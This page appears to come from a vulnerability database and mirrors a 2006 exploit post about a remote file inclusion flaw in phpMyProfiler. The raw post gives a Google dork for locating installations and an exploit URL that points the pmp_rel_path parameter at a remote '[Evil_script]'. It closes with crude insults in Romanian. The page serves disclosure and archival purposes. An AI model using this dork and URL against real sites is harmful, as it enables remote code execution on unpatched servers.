header-logo
Suggest Exploit
vendor:
phpMyProfiler
by:
mozi2weed@yahoo.com mozi
9,3
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: phpMyProfiler
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

phpMyProfiler Remote File Inclusion Vulnerability

A remote file inclusion vulnerability exists in phpMyProfiler, due to the application including files based on user input without proper validation. An attacker can exploit this vulnerability to include arbitrary remote files, allowing for the execution of arbitrary code on the vulnerable system.

Mitigation:

Input validation should be used to prevent the inclusion of malicious files.
Source

Exploit-DB raw data:

# Author: mozi2weed@yahoo.com mozi
# phpMyProfiler Remote File Inclusion Vulnerability
# Greetz: Raver #phpfreaks eu.undernet.org
------------------------------------------------------------------
Download: http://sourceforge.net/projects/phpmyprofiler
------------------------------------------------------------------
require_once($pmp_rel_path . '/include/PEAR/HTTP.php');
_________________________________________________________________
googledork:phpMyProfiler

http://site.com/[path]/functions.php?pmp_rel_path=http://[Evil_scr
ipt]
PS:Whitehat aia de pe undernet sug pula!!!  Lameri boratzi
#phpfreaks rulz
# heh tnx

# milw0rm.com [2006-10-03]

Navigation

Suggest Exploit

Services By CQR